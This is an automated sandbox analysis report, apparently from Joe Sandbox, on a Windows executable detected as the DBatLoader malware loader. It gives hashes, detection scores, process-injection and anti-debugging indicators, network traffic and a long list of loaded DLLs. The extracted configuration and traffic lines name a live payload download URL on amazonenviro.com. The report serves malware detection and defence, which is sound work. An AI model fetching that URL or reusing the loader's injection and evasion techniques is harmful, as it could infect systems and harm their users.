Windows Analysis Report
JDQS879kiy.exe

Overview

General Information

Sample name: JDQS879kiy.exe (renamed because original name is a hash value)
Original sample name: e9802e45a66c963ced0e7c60c899c5cd.exe
Analysis ID: 1590518
MD5: e9802e45a66c963ced0e7c60c899c5cd
SHA1: cd4eee552fb5b4326f5e1bc2d2b16779639d5efb
SHA256: 3cce82eff14a78c73dbc3f64a7abc6476d9b184763a5f6713ce68d6ee8df75f8
Tags: exe, user-abuse_ch

Detection

DBatLoader
Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected DBatLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • JDQS879kiy.exe (PID: 7852 cmdline: "C:\Users\user\Desktop\JDQS879kiy.exe" MD5: E9802E45A66C963CED0E7C60C899C5CD)
  • cleanup
{"Download Url": ["https://amazonenviro.com/245_Nsltarpncon"]}
Source | Rule | Description | Author | Strings
00000000.00000002.2622490407.0000000002356000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security |
00000000.00000002.2636506576.000000007FBB0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security |

Source | Rule | Description | Author | Strings
0.2.JDQS879kiy.exe.23565a8.1.raw.unpack | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security |
0.2.JDQS879kiy.exe.2840000.2.unpack | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security |
0.2.JDQS879kiy.exe.23565a8.1.unpack | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security |

No Sigma rule has matched

AV Detection

Source: JDQS879kiy.exe; Malware Configuration Extractor: DBatLoader {"Download Url": ["https://amazonenviro.com/245_Nsltarpncon"]}
Source: JDQS879kiy.exe; Virustotal: Detection: 79%
Source: JDQS879kiy.exe; ReversingLabs: Detection: 68%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: JDQS879kiy.exe; Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: unknown; HTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:49736 version: TLS 1.2
Source: C:\Users\user\Desktop\JDQS879kiy.exe; Code function: 0_2_028458B4 GetModuleHandleA, GetProcAddress, lstrcpynA, lstrcpynA, lstrcpynA, FindFirstFileA, FindClose, lstrlenA, lstrcpynA, lstrlenA, lstrcpynA, 0_2_028458B4

Networking

Source: Malware configuration extractor; URLs: https://amazonenviro.com/245_Nsltarpncon
Source: C:\Users\user\Desktop\JDQS879kiy.exe; Code function: 0_2_0285E72C InternetCheckConnectionA, 0_2_0285E72C
Source: Joe Sandbox View; JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic; Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update: 192.168.2.7:49736 -> 166.62.27.188:443
            Source: global trafficHTTP traffic detected: GET /245_Nsltarpncon HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global traffic DNS traffic detected: DNS query: time.windows.com
            Source: global traffic DNS traffic detected: DNS query: amazonenviro.com
            Source: JDQS879kiy.exe, 00000000.00000002.2621413099.000000000060A000.00000004.00000020.00020000.00000000.sdmp, JDQS879kiy.exe, 00000000.00000003.2216997321.0000000000640000.00000004.00000020.00020000.00000000.sdmp, JDQS879kiy.exe, 00000000.00000002.2621413099.000000000055E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://amazonenviro.com/
            Source: JDQS879kiy.exe, 00000000.00000002.2621413099.00000000005E5000.00000004.00000020.00020000.00000000.sdmp, JDQS879kiy.exe, 00000000.00000003.2200826171.0000000000589000.00000004.00000020.00020000.00000000.sdmp, JDQS879kiy.exe, 00000000.00000003.1493484348.0000000000614000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://amazonenviro.com/245_Nsltarpncon
            Source: JDQS879kiy.exe, 00000000.00000002.2621413099.000000000055E000.00000004.00000020.00020000.00000000.sdmp, JDQS879kiy.exe, 00000000.00000003.2200826171.0000000000589000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://amazonenviro.com:443/245_Nsltarpncon
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
            Source: unknownNetwork traffic detected: HTTP traffic on port 50087 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50064 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50123 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50117 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50098 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50029 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
            Source: unknownNetwork traffic detected: HTTP traffic on port 50086 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50063 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50124 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50092 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50041 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50097 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
            Source: unknownNetwork traffic detected: HTTP traffic on port 50030 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
            Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50069 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50101 -> 443
            Source: unknown HTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.7:49736 version: TLS 1.2
            Source: C:\Users\user\Desktop\JDQS879kiy.exe Code function: 0_2_0285DFE4 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,0_2_0285DFE4
            Source: C:\Users\user\Desktop\JDQS879kiy.exe Code function: 0_2_02857CF8 NtWriteVirtualMemory,0_2_02857CF8
            Source: C:\Users\user\Desktop\JDQS879kiy.exe Code function: 0_2_02858BA6 GetThreadContext,SetThreadContext,NtResumeThread,0_2_02858BA6
            Source: C:\Users\user\Desktop\JDQS879kiy.exe Code function: 0_2_02858BA8 GetThreadContext,SetThreadContext,NtResumeThread,0_2_02858BA8
            Source: C:\Users\user\Desktop\JDQS879kiy.exe Code function: 0_2_0285DE24 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_0285DE24
            Source: C:\Users\user\Desktop\JDQS879kiy.exe Code function: 0_2_0285DE78 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_0285DE78
            Source: C:\Users\user\Desktop\JDQS879kiy.exe Code function: 0_2_0285DF00 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,0_2_0285DF00
            Source: C:\Users\user\Desktop\JDQS879kiy.exe Code function: 0_2_0285F0A8 InetIsOffline,CoInitialize,CoUninitialize,Sleep,MoveFileA,MoveFileA,CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess,0_2_0285F0A8
            Source: C:\Users\user\Desktop\JDQS879kiy.exe Code function: 0_2_028420C4 0_2_028420C4
            Source: C:\Users\user\Desktop\JDQS879kiy.exe Code function: String function: 028446A4 appears 244 times
            Source: C:\Users\user\Desktop\JDQS879kiy.exe Code function: String function: 028444AC appears 74 times
            Source: C:\Users\user\Desktop\JDQS879kiy.exe Code function: String function: 02858798 appears 54 times
            Source: C:\Users\user\Desktop\JDQS879kiy.exe Code function: String function: 0284480C appears 931 times
            Source: C:\Users\user\Desktop\JDQS879kiy.exe Code function: String function: 028444D0 appears 33 times
            Source: C:\Users\user\Desktop\JDQS879kiy.exe Code function: String function: 0285881C appears 45 times
            Source: JDQS879kiy.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
            Source: classification engine Classification label: mal76.troj.evad.winEXE@1/0@2/1
            Source: C:\Users\user\Desktop\JDQS879kiy.exe Code function: 0_2_02847F54 GetDiskFreeSpaceA,0_2_02847F54
            Source: C:\Users\user\Desktop\JDQS879kiy.exe Code function: 0_2_02856D48 CoCreateInstance,0_2_02856D48
            Source: C:\Users\user\Desktop\JDQS879kiy.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\Users\user\Desktop\JDQS879kiy.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: JDQS879kiy.exe Virustotal: Detection: 79%
            Source: JDQS879kiy.exe ReversingLabs: Detection: 68%
            Source: C:\Users\user\Desktop\JDQS879kiy.exe File read: C:\Users\user\Desktop\JDQS879kiy.exe
            Source: C:\Users\user\Desktop\JDQS879kiy.exe Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\JDQS879kiy.exe Section loaded: version.dll
            Source: C:\Users\user\Desktop\JDQS879kiy.exe Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\JDQS879kiy.exe Section loaded: url.dll
            Source: C:\Users\user\Desktop\JDQS879kiy.exe Section loaded: ieframe.dll
            Source: C:\Users\user\Desktop\JDQS879kiy.exe Section loaded: iertutil.dll
            Source: C:\Users\user\Desktop\JDQS879kiy.exe Section loaded: netapi32.dll
            Source: C:\Users\user\Desktop\JDQS879kiy.exe Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\JDQS879kiy.exe Section loaded: winhttp.dll
            Source: C:\Users\user\Desktop\JDQS879kiy.exe Section loaded: wkscli.dll
            Source: C:\Users\user\Desktop\JDQS879kiy.exe Section loaded: netutils.dll
            Source: C:\Users\user\Desktop\JDQS879kiy.exe Section loaded: amsi.dll
            Source: C:\Users\user\Desktop\JDQS879kiy.exe Section loaded: smartscreenps.dll
            Source: C:\Users\user\Desktop\JDQS879kiy.exe Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\JDQS879kiy.exe Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\JDQS879kiy.exe Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\JDQS879kiy.exe Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\JDQS879kiy.exe Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\JDQS879kiy.exe Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\JDQS879kiy.exe Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\JDQS879kiy.exe Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\JDQS879kiy.exe Section loaded: ieproxy.dll
            Source: C:\Users\user\Desktop\JDQS879kiy.exe Section loaded: msasn1.dll
            Source: C:\Users\user\Desktop\JDQS879kiy.exe Section loaded: mssip32.dll
            Source: C:\Users\user\Desktop\JDQS879kiy.exe Section loaded: mswsock.dll
            Source: C:\Users\user\Desktop\JDQS879kiy.exe Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\JDQS879kiy.exe Section loaded: winnsi.dll
            Source: C:\Users\user\Desktop\JDQS879kiy.exe Section loaded: dnsapi.dll
            Source: C:\Users\user\Desktop\JDQS879kiy.exe Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\JDQS879kiy.exe Section loaded: fwpuclnt.dll
            Source: C:\Users\user\Desktop\JDQS879kiy.exe Section loaded: winhttpcom.dll
            Source: C:\Users\user\Desktop\JDQS879kiy.exe Section loaded: webio.dll
            Source: C:\Users\user\Desktop\JDQS879kiy.exe Section loaded: schannel.dll
            Source: C:\Users\user\Desktop\JDQS879kiy.exe Section loaded: mskeyprotect.dll
            Source: C:\Users\user\Desktop\JDQS879kiy.exe Section loaded: ntasn1.dll
            Source: C:\Users\user\Desktop\JDQS879kiy.exe Section loaded: ncrypt.dll
            Source: C:\Users\user\Desktop\JDQS879kiy.exe Section loaded: ncryptsslp.dll
            Source: C:\Users\user\Desktop\JDQS879kiy.exe Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\JDQS879kiy.exe Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\JDQS879kiy.exe Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\JDQS879kiy.exe Section loaded: gpapi.dll
            Source: C:\Users\user\Desktop\JDQS879kiy.exe Section loaded: mlang.dll
            Source: C:\Users\user\Desktop\JDQS879kiy.exe Section loaded: dpapi.dll
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
